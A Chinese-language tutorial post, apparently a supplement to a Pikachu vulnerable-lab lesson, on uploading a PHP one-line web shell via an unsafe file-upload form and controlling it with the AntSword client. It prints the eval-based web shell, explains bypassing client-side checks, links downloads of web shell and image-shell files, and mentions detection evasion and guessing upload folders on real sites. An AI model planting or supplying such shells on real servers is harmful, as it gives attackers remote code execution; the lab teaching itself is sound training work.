Unsafe Fileupload篇补充-木马的详细教程与木马分享(中国蚁剑方式)
在之前的皮卡丘靶场第九期Unsafe Fileupload篇中我们学习了木马的原理并且学了一个简单的木马文件
本期内容是为了更好的为大家解释木马(服务器方面的)的原理,连接,以及各种木马及连接工具的分享
文件木马:https://wwhc.lanzoue.com/iDYwL2ybhw4b
图片木马:https://wwhc.lanzoue.com/idhXN2ybhw2j
中国蚁剑:加载器:https://wwhc.lanzoue.com/iHq4B2yfi8yh
源码:https://wwhc.lanzoue.com/iT5ZI2yfhwzg
如果可以用github:https://github.com/AntSwordProject/
为了更好的演示,本期还是以之前Unsafe Fileupload篇制造的木马为例
同时再拓展一下木马的种类,我们用到的是一句话木马,短小精干,此外还有大马,可以干的事情更多,但是上传难度更大
打开加载器把中国蚁剑初始化,选择目录为源码的下载目录后即可使用(或者不下载源码,选择一个空目录,让加载器自己下载源码)
我们还是以皮卡丘靶场第九期Unsafe Fileupload篇的内容为例进行
<?php @eval($_POST['shell']); ?>
根据之前我们知道的,client check中我们可以通过F12禁用JavaScript来将木马上传进去
由此我们知道了上传的文件到了哪里,我们接下来用蚁剑来连接
我这里的url为
http://172.30.160.107/pikachu/vul/unsafeupload/uploads/1.php
ipv4的地址可以通过cmd输入ipconfig来获取
根据各位的情况来修改即可
我们右键选择添加数据后,填入url和密码(密码就是上面的shell)
编码器酌情选择,默认的话就是明码数据,被发现的话一抓一个准,这里用默认的演示
可以看到成功了
在此说明一下,在靶场中我们可以通过查看前端文件来了解木马文件上传位置,在实际操作中我们不可能提前知道,所以要细心观察,通常获取位置的方式有抓包或者通过常用文件夹来试探比如常见的文件夹有/uploads/、/files/、/images/
上传方面经常会用到免杀,隐写等方式来避免被识别
进去以后可以看到出货了
完成
至此,Unsafe Fileupload篇-木马补充完成